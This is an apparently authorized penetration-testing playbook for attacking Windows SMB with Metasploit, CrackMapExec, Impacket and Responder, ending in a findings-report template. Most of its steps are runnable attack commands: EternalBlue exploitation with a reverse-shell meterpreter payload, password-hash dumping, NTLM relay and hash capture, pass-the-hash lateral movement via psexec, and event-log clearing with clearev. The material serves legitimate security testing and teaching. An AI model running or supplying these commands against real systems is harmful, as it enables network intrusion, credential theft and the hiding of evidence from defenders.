exploiting-smb-vulnerabilities-with-metasploit

# Exploiting SMB Vulnerabilities with Metasploit

## When to Use

- Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
- Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
- Validating that patch management processes have addressed known SMB vulnerabilities
- Assessing SMB signing enforcement and share permission configurations across the domain
- Testing network segmentation by attempting SMB exploitation across VLAN boundaries

**Do not use** against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

## Prerequisites

- Metasploit Framework 6.x installed (`msfconsole --version`)
- Authorized penetration test scope document listing target IP ranges and approved attack types
- Network access to target SMB services (TCP 445, TCP 139)
- CrackMapExec and Impacket tools installed for complementary SMB testing
- Valid test credentials or credential wordlists approved for the engagement
- Kali Linux or equivalent testing platform

## Workflow

### Step 1: Enumerate SMB Services and Versions

```bash
# Discover hosts with SMB open using Nmap
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Use CrackMapExec for rapid SMB enumeration
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Check SMB signing status (disabled = vulnerable to relay)
crackmapexec smb 10.10.0.0/24 --smb-signing

# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
```

### Step 2: Scan for Known SMB Vulnerabilities

```bash
# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run

# Scan for MS08-067 (Conficker vulnerability)
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run

# Check for SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527)
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
```

### Step 3: Exploit EternalBlue (MS17-010)

```bash
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit

# Post-exploitation -- verify access level
meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump
```

### Step 4: Perform SMB Relay Attack

```bash
# Identify hosts without SMB signing (from Step 1)
# Set up NTLM relay with Impacket
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing
# From Meterpreter session on a compromised host:
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit

# Use responder to capture NTLM hashes for offline cracking
sudo responder -I eth0 -wrfv
```

### Step 5: Pass-the-Hash and Lateral Movement via SMB

```bash
# Extract hashes from compromised system
meterpreter> hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Use pass-the-hash with CrackMapExec
crackmapexec smb 10.10.0.0/24 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

# Use Impacket psexec for interactive shell
impacket-psexec Administrator@10.10.5.30 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use Metasploit psexec module
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit
```

### Step 6: Document Findings and Clean Up

```bash
# Document all compromised systems and access levels
# In Meterpreter, screenshot desktops for evidence
meterpreter> screenshot

# List accessible shares and sensitive data
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up -- remove any artifacts
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6> sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
```

## Key Concepts

| Term | Definition |
|------|------------|
| **EternalBlue (MS17-010)** | Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers |
| **SMB Signing** | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts |
| **Pass-the-Hash** | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash |
| **NTLM Relay** | Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user |
| **PsExec** | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM |
| **Null Session** | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems |

## Tools & Systems

- **Metasploit Framework**: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
- **CrackMapExec**: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
- **Impacket**: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
- **Responder**: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
- **enum4linux-ng**: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

## Common Scenarios

### Scenario: Internal Penetration Test Targeting Windows Domain via SMB

**Context**: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.

**Approach**:
1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
7. Document the complete attack chain showing how one unpatched system led to full domain compromise

**Pitfalls**:
- EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
- Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
- Performing hashdump on domain controllers with large databases can cause performance degradation
- Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available

## Output Format

```
## SMB Vulnerability Assessment Report

**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187

### Critical Findings

**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1

**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy

**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)
```